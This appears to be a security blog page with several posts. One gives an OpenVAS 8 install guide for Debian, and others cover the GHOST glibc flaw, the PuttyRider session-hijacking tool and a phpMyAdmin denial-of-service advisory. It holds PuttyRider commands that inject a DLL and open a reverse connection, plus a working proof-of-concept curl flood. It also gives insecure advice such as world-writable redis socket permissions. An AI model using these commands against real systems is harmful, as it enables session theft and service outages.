Install OpenVAS 8 on Debian 8 Jessie

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.

You can find all source packages for OpenVAS here.

first im gonna prepare system for openVAS;

sudo apt-get update
sudo apt-get install build-essential cmake bison flex libpcap-dev pkg-config libglib2.0-dev libgpgme11-dev uuid-dev \
sqlfairy xmltoman doxygen libssh-dev libksba-dev libldap2-dev \
libsqlite3-dev libmicrohttpd-dev libxml2-dev libxslt1-dev \
xsltproc clang rsync rpm nsis alien sqlite3 libhiredis-dev libgcrypt11-dev libgnutls28-dev redis-server texlive-latex-base

edited upon Thomas Frederiksen‘s suggestion

download sources;

wget http://wald.intevation.org/frs/download.php/2067/openvas-libraries-8.0.3.tar.gz
wget http://wald.intevation.org/frs/download.php/2071/openvas-scanner-5.0.3.tar.gz
wget http://wald.intevation.org/frs/download.php/2075/openvas-manager-6.0.3.tar.gz
wget http://wald.intevation.org/frs/download.php/2079/greenbone-security-assistant-6.0.3.tar.gz
wget http://wald.intevation.org/frs/download.php/1987/openvas-cli-1.4.0.tar.gz

open packages;

tar xvf greenbone-security-assistant-6.0.3.tar.gz
tar xvf openvas-libraries-8.0.3.tar.gz
tar xvf openvas-scanner-5.0.3.tar.gz
tar xvf openvas-manager-6.0.3.tar.gz
tar xvf openvas-cli-1.4.0.tar.gz

compile sources;


cd openvas-libraries-8.0.3
cmake .
make
make doc
sudo make install
cd ..

cd openvas-manager-6.0.3/
cmake .
make
make doc
sudo make install
cd ..

cd openvas-scanner-5.0.3/
cmake .
make
make doc
sudo make install
cd ..

cd openvas-cli-1.4.0/
cmake .
make
make doc
sudo make install

cd greenbone-security-assistant-6.0.3/
cmake .
make
make doc
sudo make install

configuration step;

sudo ldconfig

cd ~ && wget --no-check-certificate https://svn.wald.intevation.org/svn/openvas/trunk/tools/openvas-check-setup &&
chmod +x openvas-check-setup && sudo ./openvas-check-setup --v8

# Create openvas certificates:

sudo openvas-mkcert# NVT feed:
sudo openvas-nvt-sync#SCAP feed:
sudo openvas-scapdata-sync#CERT feed:
sudo openvas-certdata-sync# Generate client certificates:
sudo openvas-mkcert-client -n -i

# Signature checking of NVTs:

sudo apt-get install gnupg
wget http://www.openvas.org/OpenVAS_TI.asc
sudo gpg --homedir=/usr/local/etc/openvas/gnupg --gen-key
sudo gpg --homedir=/usr/local/etc/openvas/gnupg --import OpenVAS_TI.asc
sudo gpg --homedir=/usr/local/etc/openvas/gnupg --lsign-key 48DB4530

to help generate a lot of random bytes on another shell:

sudo dd if=/dev/zero of=/tmp/500m.tmp bs=500M count=5

or install haveged deamon:

sudo apt-get install haveged

# enable sign check:

echo "nasl_no_signature_check = no" >> /usr/local/etc/openvas/openvassd.conf

#Update portnames:

wget http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xml
openvas-portnames-update service-names-port-numbers.xml
rm service-names-port-numbers.xml

# Create admin password:

sudo openvasmd --create-user=adminuser --role=Admin

write down the password

# Set passwd policy
sudo vim /usr/local/etc/openvas/pwpolicy.conf

# install nmap 5.51:

wget http://nmap.org/dist/nmap-5.51.6.tgz &&
tar xvf nmap-5.51.6.tgz &&
cd nmap-5.51.6 &&
./configure &&
make &&
make install

# Start OpenVAS Scanner
sudo openvassd

# Initialize the Database
sudo openvasmd --rebuild --progress

# Launch OpenVAS Scanner as root
openvassd

# Launch OpenVAS Manager daemon
openvasmd

# Launch OpenVAS Greenbone Security Assistant

gsad

configure redis-server with

http://download.redis.io/redis-stable/redis.conf
changes in redis.conf

unixsocket /tmp/redis.sock
unixsocketperm 777
dir /var/dump # create and chmod with root

comment and close below;

#repl-diskless-sync no
#repl-diskless-sync-delay 5
# repl-ping-slave-period 10

connect to website with “adminuser” and the password you wrote down:

https://localhost

GHOST glibc based vulnerability in Linux systems

Researchers for Redwood City, Calif.-based security vendor Qualys Inc. discovered the vulnerability, which is officially labeled CVE-2015-0235, but has been nicknamed GHOST because it can be triggered by the DNS resolver “_gethostbyname” function. This function translates hostname to ip address. The flaw, first reported by Threatpost, has been confirmed in Linux systems using GNU C Library (glibc) versions 2.2 and newer, which includes all glibc versions released since Nov. 10, 2000.

Qualys has categorized this as a critical vulnerability due to the vast number of affected systems, and because attackers can exploit the flaw remotely to gain control of a system without having any prior knowledge of system credentials.

“GHOST poses a remote code execution risk that makes it incredibly easy for an attacker to exploit a machine,” said Wolfgang Kandek, chief technical officer for Qualys. “For example, an attacker could send a simple email on a Linux-based system and automatically get complete access to that machine.”

 

How to Test GHOST vulnerability?

$ wget https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
$ gcc GHOST.c -o GHOST
$ ./GHOST
[responds vulnerable OR not vulnerable ]

Note: Reboot your system after applying patches for this vulnerability.

How to Patch?

in debian, ubuntu systems;

$ sudo apt-get upgrade

in centos, red hat, oracle unbreakable systems

$ yum update

PuttyRider tool hijacks Putty sessions in order to sniff conversation and inject Linux commands.

Puttyrider targets sysadmin tool putty.  This tiny utility hijacks putty sessions and injects code in open sessions.

Usage;

List existing Putty processes and their status (injected / not injected)

PuttyRider.exe -l

Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don’t forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

PuttyRider.exe -x

Download, code, details here

Phpmyadmin Denial of Service Vulnerability

A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers  to
cause a denial of service (DOS) (resource consumption) via a long password.
CVE-2014-9218 was assigned
December 3, 2014 - A phpMyAdmin update and the security advisory is
published.
=============
Proof of Concept:
=============
*1 - Create the payload.*
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s"
{1..1000000} >> payload
*2 - Performing the Denial of Service attack.*
$ for i in `seq 1 150`; do (curl --data @payload
http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done
=============
Authors:
=============
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
=============
References:
====================================================================
*
http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php